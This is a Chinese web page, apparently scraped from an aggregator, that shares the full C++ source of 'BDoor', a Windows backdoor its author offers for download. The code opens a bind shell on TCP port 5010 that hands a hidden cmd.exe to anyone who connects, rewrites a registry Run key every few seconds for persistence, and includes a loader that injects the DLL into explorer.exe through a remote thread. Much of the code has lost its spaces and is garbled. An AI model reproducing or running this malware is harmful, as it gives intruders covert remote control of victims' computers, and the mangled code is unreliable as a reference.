偶看新闻苏卡达喜欢吃什么草:后门程序BDoor及源码
来源:百度文库 编辑:偶看新闻 时间:2024/04/28 08:37:11
提交时间:2005-04-22
提交用户:ffantasyYD
工具分类:后门程序
运行平台:Windows
工具大小:316825Bytes
文件MD5:95e120d97967a3679dfdbd82985ea1ca
工具来源:http://www.uestc.edu.cn/web/default.aspx
这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码,让大虾们见笑了。
>>下载<<
//BDoor.cpp:DefinestheentrypointfortheDLLapplication.
//
#include"stdafx.h"
#include"winsock2.h"
#pragmacomment(lib,"ws2_32")
#definePORT5010
#defineREG_RUN"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
structTHREADPARAM
{
SOCKETsock;
HANDLEhandle;
};
DWORDWINAPIControlThread(void*no);
DWORDWINAPIBDoor(void*lp);
DWORDWINAPIRecvThread(void*lp);
DWORDWINAPISendThread(void*lp);
DWORDWINAPIWriteReg(void*no);
BOOLAPIENTRYDllMain(HANDLEhModule,
DWORD ul_reason_for_call,
LPVOIDlpReserved
)
{
switch(ul_reason_for_call)
{
caseDLL_PROCESS_ATTACH:
{
::CreateThread(NULL,0,ControlThread,NULL,0,NULL);
break;
}
caseDLL_PROCESS_DETACH:
{
break;
}
}
returnTRUE;
}
DWORDWINAPIControlThread(void*no)
{
CreateThread(NULL,0,WriteReg,NULL,0,NULL);
WSADATAwsaData;
SOCKETlistenSock;
if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
{
return-1;
}
if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
return-1;
}
sockaddr_inlocalAddr,inAddr;
intaddrLen=sizeof(inAddr);
localAddr.sin_addr.S_un.S_addr=0;
localAddr.sin_family=AF_INET;
localAddr.sin_port=htons(PORT);
if(bind(listenSock,(sockaddr*)&localAddr,sizeof(localAddr))==SOCKET_ERROR)
{
closesocket(listenSock);
return-1;
}
listen(listenSock,5);
while(TRUE)
{
SOCKETacceptSock=accept(listenSock,(sockaddr*)&inAddr,&addrLen);
DWORDID;
CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);
Sleep(100);
}
closesocket(listenSock);
::WSACleanup();
}
DWORDWINAPIWriteReg(void*no)
{
charsysPath[MAX_PATH]={0};
intret=::GetSystemDirectory(sysPath,MAX_PATH);
if(sysPath[ret-1]!='\\')
strcat(sysPath,"\\");
strcat(sysPath,"DllInjection.exe");
intlen=strlen(sysPath);
while(TRUE)
{
HKEYhKey;
if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS)
continue;
::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE*)sysPath,len);
::RegCloseKey(hKey);
Sleep(5000);
}
return0;
}
DWORDWINAPIBDoor(void*lp)
{
SOCKETsock=*((SOCKET*)lp);
HANDLEhCmdOut,hCmdIn,hRead,hWrite;
SECURITY_ATTRIBUTESsec={0};
sec.nLength=sizeof(sec);
sec.lpSecurityDescriptor=NULL;
sec.bInheritHandle=TRUE;
CreatePipe(&hCmdIn,&hWrite,&sec,0);
CreatePipe(&hRead,&hCmdOut,&sec,0);
charcmdDir[MAX_PATH]={0};
::GetSystemDirectory(cmdDir,MAX_PATH);
if(cmdDir[strlen(cmdDir)-1]!='\\')
strcat(cmdDir,"\\");
strcat(cmdDir,"cmd.exe");
STARTUPINFOstartUpInfo={0};
startUpInfo.cb=sizeof(startUpInfo);
startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startUpInfo.wShowWindow=SW_HIDE;
startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut;
startUpInfo.hStdInput=hCmdIn;
PROCESS_INFORMATIONprocessInfo={0};
intret=CreateProcess(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo);
if(ret==0)
{
return-1;
}
CloseHandle(hCmdIn);
CloseHandle(hCmdOut);
DWORDID1,ID2;
HANDLEhRecvThread,hSendThread;
THREADPARAMrecvParam={0},sendParam={0};
recvParam.sock=sock;
recvParam.handle=hWrite;
hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);
sendParam.sock=sock;
sendParam.handle=hRead;
hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);
ULONGcode;
::WaitForSingleObject(hRecvThread,INFINITE);
::GetExitCodeThread(hSendThread,&code);
::TerminateThread(hSendThread,code);
::GetExitCodeProcess(processInfo.hProcess,&code);
::TerminateProcess(processInfo.hProcess,code);
closesocket(sock);
CloseHandle(hWrite);
CloseHandle(hRead);
return0;
}
DWORDWINAPIRecvThread(void*lp)
{
charcmd[256]={0};
THREADPARAMparam=*((THREADPARAM*)lp);
while(1)
{
chartemp[2]={0};
intret=recv(param.sock,temp,1,0);
if(ret==0)
{
break;
}
elseif(ret==1)
{
send(param.sock,temp,1,0);
strcat(cmd,temp);
if(temp[0]=='\n')
{
if(_stricmp(cmd,"exit\r\n")==0)
{
break;
}
ULONGlen;
::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);
memset(cmd,0,256);
}
}
}
return0;
}
DWORDWINAPISendThread(void*lp)
{
THREADPARAMparam=*((THREADPARAM*)lp);
charbuf[1024]={0};
while(1)
{
ULONGlen=0;
::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);
if(len>0)
{
::ReadFile(param.handle,buf,1024,&len,NULL);
send(param.sock,buf,len,0);
memset(buf,0,1024);
}
Sleep(100);
}
return0;
}
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//DllInjection.cpp:Definestheentrypointfortheapplication.
//
#include"stdafx.h"
#include"windows.h"
#include"stdlib.h"
#include"tlhelp32.h"
longGetProcessID(char*processName);
intAPIENTRYWinMain(HINSTANCEhInstance,
HINSTANCEhPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//TODO:Placecodehere.
Sleep(5000);
longID=GetProcessID("explorer");
if(ID==-1)
return-1;
HINSTANCEhDll;
HINSTANCE(*pProc)(LPCTSTR);
DWORD(WINAPI*pThreadProc)(void*);
if((hDll=::LoadLibrary("kernel32.dll"))==NULL)
return-1;
if((pProc=(HINSTANCE(*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))==NULL)
return-1;
pThreadProc=(DWORD(WINAPI*)(void*))pProc;
HANDLEhProcess=::OpenProcess(PROCESS_ALL_Access,TRUE,ID);
if(hProcess==NULL)
return-1;
charpDllPath[MAX_PATH]={0};
char*pRemoteAddr=NULL;
intret=::GetSystemDirectory(pDllPath,MAX_PATH);
if(pDllPath[ret-1]!='\\')
strcat(pDllPath,"\\");
strcat(pDllPath,"BDoor.dll");
if(::_access(pDllPath,0)==-1)
return-1;
pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath) 1,MEM_COMMIT,PAGE_READWRITE);
if(pRemoteAddr==NULL)
return-1;
ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen(pDllPath),NULL);
if(ret==0)
return-1;
HANDLEhRemoteThread=::CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);
Sleep(100);
::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath) 1,MEM_DECOMMIT);
::CloseHandle(hProcess);
return0;
}
longGetProcessID(char*processName)
{
HANDLEhSnapshot;
PROCESSENTRY32pe32={0};
BOOLfRet;
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hSnapshot==NULL)
return-1;
pe32.dwSize=sizeof(PROCESSENTRY32);
fRet=Process32First(hSnapshot,&pe32);
if(!fRet)
return-1;
intg=0;
chardrive[_MAX_DRIVE]={0};
chardir[_MAX_DIR]={0};
charfname[_MAX_FNAME]={0};
charext[_MAX_EXT]={0};
do
{
_splitpath(pe32.szExeFile,drive,dir,fname,ext);
if(_stricmp(processName,fname)==0)
{
g=1;
break;
}
}while(Process32Next(hSnapshot,&pe32));
if(g!=1)
return-1;
returnpe32.th32ProcessID;
}